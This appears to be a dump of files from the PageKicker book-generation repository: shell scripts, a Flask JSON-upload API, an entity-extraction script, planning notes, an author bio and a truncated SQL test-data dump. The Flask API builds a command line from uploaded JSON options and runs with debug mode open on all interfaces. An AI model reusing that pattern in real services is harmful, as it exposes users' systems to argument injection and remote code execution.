1.\n;;\n--txtinfile)\ntxtinfile=$2\nshift 2\n;;\n--txtinfile=*)\ntxtinfile=${1#*=}\nshift\n;;\n--chunksize)\nchunksize=$2\nshift 2\n;;\n--chunksize=*)\nchunksize=${1#*=}\nshift\n;;\n\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtinfile\" ]; then\n echo \"ERROR: option '--txtinfile[txtinfile]' not given. See --help\" >&2\n exit 1\nfi\n\necho \"chunksize is\" $chunksize\n\nfor file in *.txt\ndo\n split -b $chunksize $file \"$file.\"\n echo \"split \" $file\ndone\n\n" }, { "alpha_fraction": 0.6978922486305237, "alphanum_fraction": 0.6978922486305237, "avg_line_length": 41.70000076293945, "blob_id": "55a4e739ec8f690511cd15ead522be4536a25fd9", "content_id": "1dd3bc3e03afb733fd7edd7fc3ddd35c3b6627ca", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 427, "license_type": "permissive", "max_line_length": 113, "num_lines": 10, "path": "/scripts/includes/add_user_content.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "if [ \"$add_this_content\" = \"none\" ] ; then\n\techo \"no added content\"\n\ttouch $TMPDIR$uuid/add_this_content.\nelse\n\techo \"adding user content to front matter\"\n\tcp \"$add_this_content\" \"$TMPDIR\"$uuid\"/add_this_content_raw\"\n\techo \"$add_this_content\"\n\t\"$PANDOC_BIN\" -f docx -s -t markdown -o \"$TMPDIR\"$uuid\"/add_this_content.md \"$TMPDIR\"$uuid/add_this_content_raw\"\n\tcat $TMPDIR$uuid\"/add_this_content.md\" >> $TMPDIR$uuid/tmpbody.md\nfi\n" }, { "alpha_fraction": 0.5590627789497375, "alphanum_fraction": 0.565571129322052, "avg_line_length": 29.425743103027344, "blob_id": "9db93d55ee750e94ce8c0ac7cde62f023324dfa4", "content_id": "1503b24daee707d43a4145db5742d4f3bffa8dca", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3073, "license_type": "permissive", "max_line_length": 86, "num_lines": 101, "path": "/api/api-jsonfile.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 7 18:44:35 2016\n\n@author: fred\n\"\"\"\nimport subprocess\nimport os\nimport psutil\nimport json\nimport shlex\nimport configparser\n\nfrom flask import Flask, request, send_from_directory\nfrom werkzeug.utils import 
secure_filename\n\nimport logging\nfrom logging import FileHandler\n\n\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\ncommandpath = config.get(\"Paths\", \"commandpath\")\nmycwd = config.get(\"Paths\", \"mycwd\")\n\n\n# Configure the app\napp = Flask(__name__)\n\nfile_handler = FileHandler(\"/tmp/pagekicker/debug.log\",\"a\")\nfile_handler.setLevel(logging.WARNING)\napp.logger.addHandler(file_handler)\n\nUPLOAD_FOLDER = '/tmp/pagekicker/'\nALLOWED_EXTENSIONS = set(['json'])\n\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef allowed_file(filename):\n    return '.' in filename and \\\n           filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\[email protected]('/api-json', methods=['GET', 'POST'])\n\ndef upload_file():\n    if request.method == 'POST':\n        # check if the post request has the file part\n        if 'file' not in request.files:\n            print('No file part')\n            return 'No file part', 400\n        file = request.files['file']\n        # if the user does not select a file, the browser may\n        # submit an empty part without a filename\n        if file.filename == '':\n            print('No selected file')\n            return 'No selected file', 400\n        if file and allowed_file(file.filename):\n            filename = secure_filename(file.filename)\n            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            filename = str((os.path.join(app.config['UPLOAD_FOLDER'], filename)))\n            with open(filename) as json_data:\n                d = json.load(json_data)\n                s = ' '.join( '{} \"{}\"'.format(k, v) for k,v in d['options'].items() )\n\n            cli = commandpath + ' ' + s\n            print('command line will be' + ' ' + cli)\n            args = shlex.split(cli)\n            print(args)\n            status = subprocess.check_output(args, cwd = mycwd)\n            return send_from_directory('/tmp/pagekicker/', '4stdout.txt')\n\n# Initialize and run the server\nif __name__ == '__main__':\n\n    import click\n\n    @click.command()\n    @click.option(\"-d\", \"--daemon\", default=False, is_flag=True,\n                  help=\"Run in daemon mode.\")\n\n    def run(daemon):\n        if daemon:\n            pid_file = './api-json.pid'\n            if os.path.isfile(pid_file):\n                pid = int(open(pid_file).read())\n                os.remove(pid_file)\n                try:\n                    p = psutil.Process(pid)\n                    p.terminate()\n                except:\n                    pass\n            try:\n                p = subprocess.Popen(['python3', 'api-json.py'])\n                open(pid_file, 'w').write(str(p.pid))\n            except subprocess.CalledProcessError:\n                raise ValueError(\"error starting api-json.py daemon\")\n        else:\n            print(\"api-json running...\")\n            app.run(host='::', port=5036, debug=True)\n    run()\n" }, { "alpha_fraction": 0.8167259693145752, "alphanum_fraction": 0.8274021148681641, "avg_line_length": 186.3333282470703, "blob_id": "d7f523e00f0939152d8a3c8273f3c02cec33c6c2", "content_id": "22775294464ffb6d75f9992c68da3b5a053958e2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 562, "license_type": "permissive", "max_line_length": 421, "num_lines": 3, "path": "/conf/jobprofiles/authorbios/Jose_Cabot-Goldstein-Brown.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Jose comes from a 10th-generation American family with WASP, Jewish, Afro-American, and Hispanic grandparents. As a part of the American melting pot of cultures he has long been interested in hyphens and hyphenated families. Jose is currently editing the PageKicker series on hyphenated Americans with great pride and attention to detail. 
Please read all of his inspiring pamphlets on historically significant hyphenated Americans.\n\nJose recently attended his 1776th patriotic parade, which he felt wa fitting considering the association with the founding of the US of A.\n" }, { "alpha_fraction": 0.6206650137901306, "alphanum_fraction": 0.6271004676818848, "avg_line_length": 28.44210433959961, "blob_id": "09495bbc1257acfc27a77d7aba0265faea6d5ec2", "content_id": "71472412685b94700f7c76da63dff5b38fe8eb0f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2797, "license_type": "permissive", "max_line_length": 80, "num_lines": 95, "path": "/scripts/bin/nerv3.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n# Jeffrey Herbstman\n# nerv3.py\n# Goal: Named entity recognition script to pull names/place from text\n# called as python nerv3.py text_path_or_file\n#\n# Inputs:\n# path - text file or directory containing text files\n# output - output file name\n# Outputs:\n# Output file written\n#\n###################################################\n\n#gonna need to install AlchemyAPI\nimport AlchemyAPI\nimport argparse\nimport xml.etree.ElementTree as ET\nimport collections\nimport codecs\nimport os\n#from IPython import embed\n#=================================================\ndef listwrite(output_file,thelist):\n\tfor item in thelist:\n\t\titem.encode('utf-8')\n\t\toutput_file.write(\"%s\\n\" % item)\n\n#=================================================\n\ndef main():\n\n\ttmpdir = \"/tmp/pagekicker\"\n\n\t#personal api key saved as api_key.txt\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('path', help = \"target file or directory for NER\")\n\tparser.add_argument('output', help = \"target file for output\")\n\tparser.add_argument('uuid', help = \"uuid\")\n\targs = parser.parse_args()\n\n\tin_file = args.path\n\tout_file = args.output\n\tuuid = args.uuid\n\tfolder = os.path.join(tmpdir, uuid)\n\t# print folder\t\n\tcwd = os.getcwd()\n\tapikey_location = os.path.join(cwd, \"api_key.txt\")\n\n\twith open(in_file) as f:\n\t\ttext = f.read()\n\n\talchemyObj = AlchemyAPI.AlchemyAPI()\n\talchemyObj.loadAPIKey(apikey_location)\n\n\tresult = alchemyObj.TextGetRankedNamedEntities(text)\n\n\troot = ET.fromstring(result)\n\n\tplace_list = ['City', 'Continent', 'Country', 'Facility', 'GeographicFeature',\\\n\t'Region', 'StateOrCounty']\n\tPeople = {}\n\tPlaces = {}\n\tOther = {}\n\n\tfor entity in root.getiterator('entity'):\n\t\tif entity[0].text == 'Person':\n\t\t\tPeople[entity[3].text]=[entity[1].text, entity[2].text]\n\t\telif entity[0].text in place_list:\n\t\t\tPlaces[entity[3].text] = [entity[1].text, entity[2].text]\n\t\telse:\n\t\t\tOther[entity[3].text] = [entity[1].text, entity[2].text]\n\n\t#print lists ordered by relevance\n\tPlaces_s = sorted(Places, key = Places.get, reverse = True)\n\tPeople_s = sorted(People, key = People.get, reverse = True)\n\tOther_s = sorted(Other, key = Other.get, reverse = True)\n\n\twith codecs.open(out_file, mode = 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, People_s)\n\t\tlistwrite(o, Places_s)\n\t\tlistwrite(o, Other_s)\n\tout_file = os.path.join(folder, 'People')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, People_s)\n\tout_file = os.path.join(folder, 'Places')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, 
Places_s)\n\tout_file = os.path.join(folder, 'Other')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, Other_s)\n#=================================================\nif __name__ == '__main__':\n    main()\n" }, { "alpha_fraction": 0.7789541482925415, "alphanum_fraction": 0.781520664691925, "avg_line_length": 66.76087188720703, "blob_id": "506bb73e2e7c80b984020284b27ebc50c9af92f3", "content_id": "6078fcbc34a6862ab8f72dfd1d6fd8a9eef1aca6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3119, "license_type": "permissive", "max_line_length": 417, "num_lines": 46, "path": "/scripts/enrollbuildandshare.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# enroll, build, and share (ebs.sh)\nEnroll creates a single graph ID; however, it should also have embedded logic, like a prefix for a business, a geolocation ID, and a language and topic coding. The builds should all flow for fastest processing. The sharing should have a priority: social first, adjacent topics second, serendipitous third, and obvious extensions fourth.\n# enroll new users\nAt a certain point, we should create a new user profile if the search is distinct enough. Not a second data capture, just a recognition that the graph is far enough apart from a prior seeded graph that it should not generate the same social, adjacent, and obvious extensions....\n# authenticate via FB, LinkedIn, or Twitter\nAuthenticate and offer a chance for the user to disambiguate (under the $1.99 subscription model) at this time\n# create user id & account\nThe account is already created; what I envision is that the ID begins to be created as the data and the seed terms are ranked and processed\n# capture user input re seeds\nOriginal data, second-pass data, and permissioned data from the social sites and their profiles\n# analyze and assemble user provided seeds\n\n# build user provided seeds\nMatch with system provided obvious seed packages (SEED--music, top 40,....SEED PACKAGE---list of top 40 songs for the week, match all artists on the list, provide play list for each artist)\n\n# harvest graphs from FB, LinkedIn, Twitter\nIs this occurring after the creation of the ID? Or is this part of the creation of an ID for a graph?\n\t#FB\n\n\t#LinkedIn\n\n\t#Twitter\n\n# carry out entity extraction and analysis against\nDon’t do all of the analysis at the start. Cache it and deliver the analysis in 5 minutes. Allow the first couple of graphs to fill, and then provide the follow-on. The user experience will look for a natural feedback, so new input will continually refine the graph. I bet that practiced users will be looking for a higher order build, and will appreciate the lag as it will allow for a refinement of the seed terms.\n\t#FB\n\n\t#LinkedIn\n\n\t#Twitter\n\n# is it better to harvest all at once, then analyze all at once, or to harvest & extract one at a time? Following the above logic, harvest and extract one at a time, allowing for a superior build. Users will begin to choose which to harvest first, and will guide for a better harvest and extraction with practice. 
This will become part of the user ID (say use FB first for my son and LinkedIn for me)\n\n\n# analyze and assemble list of graph provided seeds\n\n# compare graph provided seeds to user provided seeds, eliminate duplicates\nWill the same seeds provide identical results if they search in slightly different data pools or in a different sequence? Before we eliminate dups, we should ask if the customer wants all dups searched in different sequences...etc.\n# should user provided seeds trump? not necessarily ...\nProvide all, until the user profile suggests a preference\n# build graph provided seeds\n\n# when all (most?) builds are complete ...\nNot sure. Good question. Needs data on the user experience. \n# share all/most graphs\nSame as above\n" }, { "alpha_fraction": 0.6942551136016846, "alphanum_fraction": 0.6942551136016846, "avg_line_length": 64.41935729980469, "blob_id": "0ae0078c0c4fbf9855a56ccc8b0a0680401d55b8", "content_id": "7fee8e3529827fd7f6a009a020fd3341657ab860", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2054, "license_type": "permissive", "max_line_length": 90, "num_lines": 31, "path": "/scripts/includes/echo-flags.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " \necho \"values after command line processing are:\" | tee --append $sfb_log\necho \"mediatargetpath is\" $mediatargetpath | tee --append $sfb_log\necho \"deliverytargetpath is \" $deliverytargetpath | tee --append $sfb_log\necho \"metadatatargetpath is \" $metadatatargetpath | tee --append $sfb_log\necho \"scriptpath is\" $scriptpath | tee --append $sfb_log\necho \"price is \" ${FLAGS_price} | tee --append $sfb_log\necho \"category id is \" ${FLAGS_categoryid} | tee --append $sfb_log\necho \"value of rows is \" ${FLAGS_rows} | tee --append $sfb_log\necho \"seedfile is \" ${FLAGS_seedfile} | tee --append $sfb_log\necho \"escapecustomtitle is \" $escapecustomtitle| tee --append $sfb_log\necho \"userid is \" ${FLAGS_userid} | tee --append $sfb_log\necho \"coverfile is \" ${FLAGS_coverfile} | tee --append $sfb_log\necho \"fetchonly is \" ${FLAGS_fetchonly} | tee --append $sfb_log\necho \"fetchfile is \" ${FLAGS_fetchfile} | tee --append $sfb_log\necho \"special_lasts_minutes \" ${FLAGS_special_lasts_minutes} | tee --append $sfb_log\necho \"special price is \" ${FLAGS_special_price} | tee --append $sfb_log\necho \"covercolor is \" ${FLAGS_covercolor} | tee --append $sfb_log\necho \"text extraction is on \" ${FLAGS_text_extraction_on} | tee --append $sfb_log\necho \"fresh is \" ${FLAGS_fresh} | tee --append $sfb_log\necho \"escapeedited_by is \" $escapeedited_by | tee --append $sfb_log\necho \"seedsource is \" ${FLAGS_seedsource} | tee --append $sfb_log\necho \"breaking is \" ${FLAGS_breaking} | tee --append $sfb_log\necho \"covertype id is \" ${FLAGS_covertype_id} | tee --append $sfb_log\necho \"editorid is \" ${FLAGS_editorid} | tee --append $sfb_log\necho \"escapesingleseed is \" $escapesingleseed | tee --append $sfb_log\necho \"import is \" ${FLAGS_import} | tee --append $sfb_log\necho \"fleet is \" ${FLAGS_fleet} | tee --append $sfb_log\necho \"booktype is \" ${FLAGS_booktype} | tee --append $sfb_log\necho \"ebookformat is \" ${FLAGS_ebookformat} | tee --append $sfb_log\necho \"endurl is\" ${FLAGS_endurl} | tee --append $sfb_log\necho \"fetched_document_format is\" ${FLAGS_fetched_document_format} | tee --append $sfb_log\n" }, { "alpha_fraction": 0.7873429656028748, "alphanum_fraction": 0.7882736325263977, "avg_line_length": 
88.54166412353516, "blob_id": "43c58242fe106bf08733b56e9a9db6cf70e2443f", "content_id": "160532a519b092bf5619d3b05bdb6ca56607f836", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2149, "license_type": "permissive", "max_line_length": 291, "num_lines": 24, "path": "/docs/fetcher_requirements.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Fetcher Responsibilities\n\nIn PageKicker **fetchers** are programs that accept input parameters (typically, queries) and return relevant documents for inclusion in the completed book. Python or bash are preferred.\n\nFetchers must do the following things. (In future all this stuff should be much more abstracted).\n\n- Accept one or more **seeds** (key phrases) read from $TMPDIR$uuid/seedphrases.\n - Other parameters such as geography, language, are optional. It is the responsibility of the fetcher to provide a mechanism for the operator to provide those parameters. Usually, this should be accomplished via the command line, or in a file specified at the command line.\n- Validate with an external API.\n- Submit queries using seeds to the API. It's the fetcher's responsibility to put those queries in the desired. Default should be alpha.\n- Store results in $TMPDIR$uuid/apis/<apiname>\n- Preferred result format is markdown. Other formats should be converted to markdown. Converting \"up\" from low-semantic-value-added formats such as txt and json to markdown produces more reliable results than converting \"down\" from PDF and html. Markdown supports simple tables and images.\n- Create bibliography entries for each fetched document (text format) and store them in $TMPDIR$uuid/apis/<apiname>/bibentries.txt\n\nFor fetched documents to be incorporated in books, the following things must occur.\n\nText from fetched documents should by default be included in the cover wordcloud, which means that it needs to be appended to $TMPDIR$uuid/wiki/wiki4cloud.md prior to the java -jar command that builds the wordcloud. (In future this should be abstracted to 4cloud.md).\n\nText from fetched documents should be either:\na) appended to an existing \"part of the book\", such as $TMPDIR$uuid/chapters.md, or ...\nb) given its own \"new\" part of the book, e.g. $TMPDIR$uuid/cyberwatch.md.\nc) New parts of the book must be registered in all --booktype scripts, i.e. the cat commands in includes/partsofthebook.sh and includes/draft-report.sh.\n\nBibliography entries from fetched documents need to be piped into $TMPDIR$uuid/sources.md when that file is created.\n" }, { "alpha_fraction": 0.6468735933303833, "alphanum_fraction": 0.659919023513794, "avg_line_length": 19.971698760986328, "blob_id": "34776adff6c2cbd31afb23a9db237e0f78113895", "content_id": "a0c1d1b8b3a112af506b1bee19a185fb6df72033", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2223, "license_type": "permissive", "max_line_length": 124, "num_lines": 106, "path": "/scripts/process_txt_dir.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# processes all txt files in a directory\n\n\n# input: directory path that contains txt files with txt extension\n# note - this would break on splitter output - fix\n# output: directory with results\n\n. 
includes/set-variables.sh\nwordcloud=\"off\"\nconfigfile=\"lib/IBMcloud/examples/configuration.txt\"\noutdir=\"\"\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires user to provide path to directory containing one or more txt files\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--txtdir)\ntxtdir=$2\nshift 2\n;;\n--txtdir=*)\ntxtdir=${1#*=}\nshift\n;;\n--stopimagefolder)\nstopimagefolder=$2\nshift 2\n;;\n--stopimagefolder=*)\nstopimagefolder=${1#*=}\nshift\n;;\n--outdir)\noutdir=$2\nshift 2\n;;\n--outdir=*)\noutdir=${1#*=}\nshift\n;;\n--wordcloud)\nwordcloud=$2\nshift 2\n;;\n--wordcloud=*)\nwordcloud=${1#*=}\nshift\n;;\n--summary_lines)\nsummary_lines=$2\nshift 2\n;;\n--summary_lines=*)\nsummary_lines=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtdir\" ]; then\n echo \"ERROR: option '--txtdir[txtdir]' not given. See --help\" >&2\n exit 1\nfi\n\nmkdir -p -m 755 $outdir\n\nfor file in \"$txtdir\"*.txt\ndo\n\toutfile=`basename $file`\n\t\"$PYTHON_BIN\" \"$scriptpath\"bin/PKsum.py $file --output $outdir$outfile\".sum\" --length 1 \n\t\"$PYTHON_BIN\" \"$scriptpath\"bin/nerv3.py $file $outdir$outfile\".ner\" $outdir$outfile\".\"\n\n\tif [ \"$wordcloud\" = \"on\" ] ; then\n\n\t\t/opt/bitnami/apache2/htdocs/pk-new/development/scripts/bin/wordcloudwrapper.sh --txtinfile $file --outfile $outdir$outfile\n\t\t echo \"summarized and recognized proper nouns, and built wordcloud for\" $file \n\n\telse\n\t\t echo \"summarized and recognized proper nouns for\" $file \n\tfi\ndone\necho \"done processing individual txt files in directory \" $txtdir\ncat $outdir*.ner > $outdir\"all.ner.txt\"\ncat $outdir*.sum > $outdir\"all.sum.txt\"\n\necho \"concatenated results into txt files containing all NER results, all summary results, and the union of both\"\n\nexit 0\n" }, { "alpha_fraction": 0.2883087694644928, "alphanum_fraction": 0.6604402661323547, "avg_line_length": 68.45526123046875, "blob_id": "ba2bf7705a37fa66271101a9ce1d2a4dd74f9e58", "content_id": "d37f63cc43515e3adfe96f640d8ba4797839b7d2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 79258, "license_type": "permissive", "max_line_length": 585, "num_lines": 1140, "path": "/conf/databases/sfb-test-data.sql", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "-- phpMyAdmin SQL Dump\n-- version 4.0.5\n-- http://www.phpmyadmin.net\n--\n-- Host: localhost:3306\n-- Generation Time: Nov 16, 2013 at 06:11 PM\n-- Server version: 5.5.32\n-- PHP Version: 5.4.19\n\nSET SQL_MODE = \"NO_AUTO_VALUE_ON_ZERO\";\nSET time_zone = \"+00:00\";\n\n\n/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n/*!40101 SET NAMES utf8 */;\n\n--\n-- Database: `sfb-jobs`\n--\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `books`\n--\n\nCREATE TABLE IF NOT EXISTS `books` (\n `SKU` int(11) NOT NULL,\n `Booktype` text CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,\n `uuid` text CHARACTER SET latin1 NOT NULL,\n `seed` text CHARACTER SET latin1 NOT NULL,\n `graph` int(11) NOT NULL\n) ENGINE=InnoDB DEFAULT 
CHARSET=utf8;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `graph nodes`\n--\n\nCREATE TABLE IF NOT EXISTS `graph nodes` (\n `URL` text NOT NULL,\n `DOI` text NOT NULL,\n `Title` int(11) NOT NULL,\n `Source` int(11) NOT NULL,\n `nodeid` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`nodeid`)\n) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `graphs`\n--\n\nCREATE TABLE IF NOT EXISTS `graphs` (\n `graphid` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`graphid`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `isbns`\n--\n\nCREATE TABLE IF NOT EXISTS `isbns` (\n `ISBN` mediumtext NOT NULL,\n `Title` mediumtext NOT NULL,\n `id` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='manage ISBNs' AUTO_INCREMENT=39 ;\n\n--\n-- Dumping data for table `isbns`\n--\n\nINSERT INTO `isbns` (`ISBN`, `Title`, `id`) VALUES\n('9781608880003', 'Azkatraz 2009', 1),\n('9781608880010', 'Ultimate Unofficial Guide to The Harry Potter Fandom, The', 2),\n('9781608880027', 'Simple Sabotage Manual: Timeless Managerial Wisdom from the Intelligence Community, The', 3),\n('9781608880041', 'Young Conservative''s Field Guide, The', 4),\n('9781608880058', 'Case of the Truncated Troodon, The', 5),\n('9781608880065', 'Journey to the Ends of the Earth', 6),\n('9781608880072', 'Fifty Years of Flight Research: An Annotated Bibliography of Technical Publications of NASA Dryden Flight Research Center, 1946-1996', 7),\n('9781608880089', 'European Axis Signal Intelligence in World War II', 8),\n('9781608880096', 'Cold War Saga', 9),\n('9781608880102', 'LOST SYMBOL -- Found: Unauthorized Analysis of Dan Brown''s Novel, THE', 10),\n('9781608880119', 'LOST SYMBOL -- Found: Unauthorized Analysis of Dan Brown''s Novel, THE', 11),\n('9781608880126', 'Tora Bora Revisited: How We Failed to Catch Osama Bin Laden and How It Matters Today', 12),\n('9781608880133', 'US Patrol Torpedo Boats in World War II, 1939-1945', 13),\n('9781608880140', 'Young Conservative''s Field Guide, The', 14),\n('9781608880157', 'German Underwater Ordnance Mines', 15),\n('9781608880164', 'Warner Bros. Entertainment, Inc. & J. K. Rowling v. RDR Books and 10 Does', 16),\n('9781608880171', 'Skeeter Uses Manners', 17),\n('9781608880188', 'Case of the Armored Allosaurus, The', 18),\n('9781608880195', 'You''ve Got to Stand for Something!', 19),\n('9781608880201', 'Operation Weseruebung: The Dawn of Decisive Airpower in Joint Military Operations', 20),\n('9781608880218', 'So Much for Democracy: Citizens United v. Federal Election Commission', 21),\n('9781608880225', 'Operation Sea Lion: A Joint Critical Analysis, Or, How Hitler Could Have Won, If He Were More \"Joint\"', 22),\n('9781608880232', 'Sea-Based Airpower - The Decisive Factor In Expeditionary Operations? (Norway, 1940; Falkland Islands, 1982)', 23),\n('9781608880249', 'Oops! Boom! 
An Analysis of Fratricide in US Naval Surface and Submarine Forces in World War II', 24),\n('9781608880256', 'Submarine Warfare in the 20th and 21st Centuries - A Bibliography', 25),\n('9781608880263', 'Influence of Naval Power on the Course of the Spanish Civil War, 1936-1939, The', 26),\n('9781608880270', 'Historical Bibliography of Sea Mine Warfare', 27),\n('9781608880287', 'Influence of Maritime Theorists Alfred Thayer Mahan and Sir Julian Corbett on the Development of German Naval Strategy 1930-1936, The', 28),\n('9781608880294', 'Command and Control of the First Modern \"Joint\" Campaign: the German Invasion of Denmark and Norway, April 1940', 29),\n('9781608880300', 'Hitler''s Malta Option: A Comparison of the Invasion of Crete (Operation Merkur) and the Proposed Invasion of Malta (Operation Hercules)', 30),\n('9781608880317', 'Freyburg''s Failure At Crete: A Close-Run Thing', 31),\n('9781608880324', 'Falling from Grace: The German Airborne (Fallschirmjager) in World War II', 32),\n('9781608880331', 'Why the Allies Lost the Battle of Crete: How Allied Indecision, Bureaucracy, and Pretentiousness Lost the Battle', 33),\n('9781608880362', 'Obama''s Nuclear Posture Review: Or, We Won''t Nuke You Unless You Are a Really Bad Country, or We Change Our Minds', 34),\n('9781608880379', 'Self-Inflicted Wound Allied Defeat In Crete, May 1941', 35),\n('9781608880393', 'World War II Vertical Envelopment: The German Influence on U.S. Army Airborne Operations', 36),\n('9781608880409', 'Crete: The Graveyard of the Fallschirmjäger', 37),\n('9781608880416', 'Airborne and Airlift Operations in WWII (Enhanced with Text Analytics by PageKicker)', 38);\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `jobs`\n--\n\nCREATE TABLE IF NOT EXISTS `jobs` (\n `SFB_revision_no` int(11) NOT NULL,\n `uuid` mediumtext NOT NULL,\n `job_created_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,\n `PRIMARY` int(11) NOT NULL AUTO_INCREMENT,\n `LANG` enum('en_US.UTF-8','cs_CZ.UTF-8','it_IT.UTF-8') NOT NULL DEFAULT 'en_US.UTF-8' COMMENT 'environment variable value',\n PRIMARY KEY (`PRIMARY`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=442 ;\n\n--\n-- Dumping data for table `jobs`\n--\n\nINSERT INTO `jobs` (`SFB_revision_no`, `uuid`, `job_created_time`, `PRIMARY`, `LANG`) VALUES\n(341, '29d47ca0-ddf5-11e2-acfa-12313d015d04', '2013-06-26 00:13:01', 1, 'en_US.UTF-8'),\n(341, '776fabba-ddf5-11e2-acfa-12313d015d04', '2013-06-26 00:15:11', 2, 'en_US.UTF-8'),\n(341, 'c76e7e34-ddf5-11e2-acfa-12313d015d04', '2013-06-26 00:17:25', 3, 'en_US.UTF-8'),\n(341, 'f1695e84-ddf5-11e2-acfa-12313d015d04', '2013-06-26 00:18:36', 4, 'en_US.UTF-8'),\n(341, '952698de-ddf6-11e2-acfa-12313d015d04', '2013-06-26 00:23:10', 5, 'en_US.UTF-8'),\n(341, '3260b1a2-ddf7-11e2-acfa-12313d015d04', '2013-06-26 00:27:34', 6, 'en_US.UTF-8'),\n(341, '4bee0090-de9f-11e2-acfa-12313d015d04', '2013-06-26 20:30:52', 7, 'en_US.UTF-8'),\n(341, 'a123b32a-de9f-11e2-acfa-12313d015d04', '2013-06-26 20:33:15', 8, 'en_US.UTF-8'),\n(341, '4d370766-dea0-11e2-acfa-12313d015d04', '2013-06-26 20:38:04', 9, 'en_US.UTF-8'),\n(341, 'd4ee4782-dea0-11e2-acfa-12313d015d04', '2013-06-26 20:41:52', 10, 'en_US.UTF-8'),\n(341, '666d01da-dea1-11e2-acfa-12313d015d04', '2013-06-26 20:45:56', 11, 'en_US.UTF-8'),\n(341, 'e32256de-dea2-11e2-acfa-12313d015d04', '2013-06-26 20:56:35', 12, 'en_US.UTF-8'),\n(341, '338747be-dea4-11e2-acfa-12313d015d04', '2013-06-26 21:05:59', 13, 'en_US.UTF-8'),\n(341, 
